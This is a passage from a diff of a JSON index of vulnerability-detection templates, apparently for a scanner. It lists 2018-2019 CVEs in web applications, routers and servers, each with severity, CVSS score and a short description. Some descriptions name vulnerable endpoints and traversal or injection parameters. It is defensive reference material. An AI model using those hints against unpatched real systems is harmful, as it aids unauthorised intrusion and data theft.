{"ID":"CVE-2018-7662","Info":{"Name":"CouchCMS \u003c= 2.0 - Path Disclosure","Severity":"medium","Description":"CouchCMS \u003c= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-7662.yaml"} {"ID":"CVE-2018-7700","Info":{"Name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","Severity":"high","Description":"DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-7700.yaml"} {"ID":"CVE-2018-7719","Info":{"Name":"Acrolinx Server \u003c5.2.5 - Local File Inclusion","Severity":"high","Description":"Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7719.yaml"} @@ -602,7 +646,7 @@ {"ID":"CVE-2019-11248","Info":{"Name":"Debug Endpoint pprof - Exposure Detection","Severity":"high","Description":"The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2019/CVE-2019-11248.yaml"} {"ID":"CVE-2019-11370","Info":{"Name":"Carel pCOWeb \u003cB1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2019/CVE-2019-11370.yaml"} {"ID":"CVE-2019-11510","Info":{"Name":"Pulse Connect Secure SSL VPN Arbitrary File Read","Severity":"critical","Description":"Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-11510.yaml"} -{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"} +{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"} {"ID":"CVE-2019-11581","Info":{"Name":"Atlassian Jira Server-Side Template Injection","Severity":"critical","Description":"Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11581.yaml"} {"ID":"CVE-2019-11869","Info":{"Name":"WordPress Yuzo \u003c5.12.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting\nbecause it mistakenly expects that is_admin() verifies that the\nrequest comes from an admin user (it actually only verifies that the\nrequest is for an admin page). An unauthenticated attacker can consequently inject\na payload into the plugin settings, such as the\nyuzo_related_post_css_and_style setting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-11869.yaml"} {"ID":"CVE-2019-12276","Info":{"Name":"GrandNode 4.40 - Local File Inclusion","Severity":"high","Description":"GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12276.yaml"} @@ -631,15 +675,20 @@ {"ID":"CVE-2019-14470","Info":{"Name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","Severity":"medium","Description":"WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14470.yaml"} {"ID":"CVE-2019-14530","Info":{"Name":"OpenEMR \u003c5.0.2 - Local File Inclusion","Severity":"high","Description":"OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-14530.yaml"} {"ID":"CVE-2019-14696","Info":{"Name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","Severity":"medium","Description":"Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14696.yaml"} +{"ID":"CVE-2019-14750","Info":{"Name":"osTicket \u003c 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14750.yaml"} +{"ID":"CVE-2019-14789","Info":{"Name":"Custom 404 Pro \u003c 3.2.8 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14789.yaml"} {"ID":"CVE-2019-14974","Info":{"Name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","Severity":"medium","Description":"SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14974.yaml"} {"ID":"CVE-2019-15043","Info":{"Name":"Grafana - Improper Access Control","Severity":"high","Description":"Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-15043.yaml"} {"ID":"CVE-2019-15107","Info":{"Name":"Webmin \u003c= 1.920 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Webmin \u003c=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15107.yaml"} {"ID":"CVE-2019-15501","Info":{"Name":"L-Soft LISTSERV \u003c16.5-2018a - Cross-Site Scripting","Severity":"medium","Description":"L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15501.yaml"} +{"ID":"CVE-2019-15642","Info":{"Name":"Webmin \u003c 1.920 - Authenticated Remote Code Execution","Severity":"high","Description":"rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states \"RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users.\"\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15642.yaml"} {"ID":"CVE-2019-15713","Info":{"Name":"WordPress My Calendar \u003c= 3.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin My Calendar \u003c= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15713.yaml"} {"ID":"CVE-2019-15811","Info":{"Name":"DomainMOD \u003c=4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15811.yaml"} +{"ID":"CVE-2019-15829","Info":{"Name":"Gallery Photoblocks \u003c 1.1.43 - Cross-Site Scripting","Severity":"medium","Description":"The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2019/CVE-2019-15829.yaml"} {"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15858.yaml"} {"ID":"CVE-2019-15859","Info":{"Name":"Socomec DIRIS A-40 Devices Password Disclosure","Severity":"critical","Description":"Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15859.yaml"} {"ID":"CVE-2019-15889","Info":{"Name":"WordPress Download Manager \u003c2.9.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15889.yaml"} +{"ID":"CVE-2019-16057","Info":{"Name":"D-Link DNS-320 - Remote Code Execution","Severity":"critical","Description":"The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-16057.yaml"} {"ID":"CVE-2019-16097","Info":{"Name":"Harbor \u003c=1.82.0 - Privilege Escalation","Severity":"medium","Description":"Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-16097.yaml"} {"ID":"CVE-2019-16123","Info":{"Name":"PilusCart \u003c=1.4.1 - Local File Inclusion","Severity":"high","Description":"PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-16123.yaml"} {"ID":"CVE-2019-16278","Info":{"Name":"nostromo 1.9.6 - Remote Code Execution","Severity":"critical","Description":"nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-16278.yaml"} @@ -662,6 +711,8 @@ {"ID":"CVE-2019-17506","Info":{"Name":"D-Link DIR-868L/817LW - Information Disclosure","Severity":"critical","Description":"D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-17506.yaml"} {"ID":"CVE-2019-17538","Info":{"Name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","Severity":"high","Description":"Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1\u0026name=../.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-17538.yaml"} {"ID":"CVE-2019-17558","Info":{"Name":"Apache Solr \u003c=8.3.1 - Remote Code Execution","Severity":"high","Description":"Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-17558.yaml"} +{"ID":"CVE-2019-17574","Info":{"Name":"Popup-Maker \u003c 1.8.12 - Broken Authentication","Severity":"critical","Description":"An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the \"support debug text file\").\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2019/CVE-2019-17574.yaml"} +{"ID":"CVE-2019-17662","Info":{"Name":"ThinVNC 1.0b1 - Authentication Bypass","Severity":"critical","Description":"ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-17662.yaml"} {"ID":"CVE-2019-1821","Info":{"Name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","Severity":"critical","Description":"Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-1821.yaml"} {"ID":"CVE-2019-18371","Info":{"Name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","Severity":"high","Description":"Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-18371.yaml"} {"ID":"CVE-2019-18393","Info":{"Name":"Ignite Realtime Openfire \u003c4.42 - Local File Inclusion","Severity":"medium","Description":"Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-18393.yaml"} @@ -670,9 +721,10 @@ {"ID":"CVE-2019-18818","Info":{"Name":"strapi CMS \u003c3.0.0-beta.17.5 - Admin Password Reset","Severity":"critical","Description":"strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-18818.yaml"} {"ID":"CVE-2019-18922","Info":{"Name":"Allied Telesis AT-GS950/8 - Local File Inclusion","Severity":"high","Description":"Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-18922.yaml"} {"ID":"CVE-2019-18957","Info":{"Name":"MicroStrategy Library \u003c11.1.3 - Cross-Site Scripting","Severity":"medium","Description":"MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-18957.yaml"} +{"ID":"CVE-2019-1898","Info":{"Name":"Cisco RV110W RV130W RV215W Router - Information leakage","Severity":"medium","Description":"A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-1898.yaml"} {"ID":"CVE-2019-19134","Info":{"Name":"WordPress Hero Maps Premium \u003c=2.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19134.yaml"} {"ID":"CVE-2019-19368","Info":{"Name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19368.yaml"} -{"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"} +{"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"} {"ID":"CVE-2019-19781","Info":{"Name":"Citrix ADC and Gateway - Directory Traversal","Severity":"critical","Description":"Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-19781.yaml"} {"ID":"CVE-2019-19824","Info":{"Name":"TOTOLINK Realtek SD Routers - Remote Command Injection","Severity":"high","Description":"TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-19824.yaml"} {"ID":"CVE-2019-19908","Info":{"Name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","Severity":"medium","Description":"phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19908.yaml"} @@ -691,7 +743,7 @@ {"ID":"CVE-2019-2729","Info":{"Name":"Oracle WebLogic Server Administration Console - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-2729.yaml"} {"ID":"CVE-2019-2767","Info":{"Name":"Oracle Business Intelligence Publisher - XML External Entity Injection","Severity":"high","Description":"Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2019/CVE-2019-2767.yaml"} {"ID":"CVE-2019-3396","Info":{"Name":"Atlassian Confluence Server - Path Traversal","Severity":"critical","Description":"The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-3396.yaml"} -{"ID":"CVE-2019-3398","Info":{"Name":"Atlassian Confluence Download Attachments - Remote Code Execution","Severity":"high","Description":"Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2019/CVE-2019-3398.yaml"} +{"ID":"CVE-2019-3398","Info":{"Name":"Atlassian Confluence Download Attachments - Remote Code Execution","Severity":"high","Description":"Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-3398.yaml"} {"ID":"CVE-2019-3401","Info":{"Name":"Atlassian Jira \u003c7.13.3/8.0.0-8.1.1 - Incorrect Authorization","Severity":"medium","Description":"Atlasssian Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 is susceptible to incorrect authorization. The ManageFilters.jspa resource allows a remote attacker to enumerate usernames via an incorrect authorization check, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-3401.yaml"} {"ID":"CVE-2019-3402","Info":{"Name":"Jira \u003c 8.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-3402.yaml"} {"ID":"CVE-2019-3403","Info":{"Name":"Jira - Incorrect Authorization","Severity":"medium","Description":"Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-3403.yaml"} @@ -707,6 +759,7 @@ {"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-6715.yaml"} {"ID":"CVE-2019-6799","Info":{"Name":"phpMyAdmin \u003c4.8.5 - Local File Inclusion","Severity":"medium","Description":"phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2019/CVE-2019-6799.yaml"} {"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver \u003c1.2.5 - Carriage Return Line Feed Injection","Severity":"medium","Description":"Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-6802.yaml"} +{"ID":"CVE-2019-7192","Info":{"Name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","Severity":"critical","Description":"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7192.yaml"} {"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7219.yaml"} {"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7238.yaml"} {"ID":"CVE-2019-7254","Info":{"Name":"eMerge E3 1.00-06 - Local File Inclusion","Severity":"high","Description":"Linear eMerge E3-Series devices are vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-7254.yaml"} @@ -718,6 +771,7 @@ {"ID":"CVE-2019-7543","Info":{"Name":"KindEditor 4.1.11 - Cross-Site Scripting","Severity":"medium","Description":"KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7543.yaml"} {"ID":"CVE-2019-7609","Info":{"Name":"Kibana Timelion - Arbitrary Code Execution","Severity":"critical","Description":"Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-7609.yaml"} {"ID":"CVE-2019-8086","Info":{"Name":"Adobe Experience Manager - XML External Entity Injection","Severity":"high","Description":"Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-8086.yaml"} +{"ID":"CVE-2019-8390","Info":{"Name":"qdPM 9.1 - Cross-site Scripting","Severity":"medium","Description":"qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] 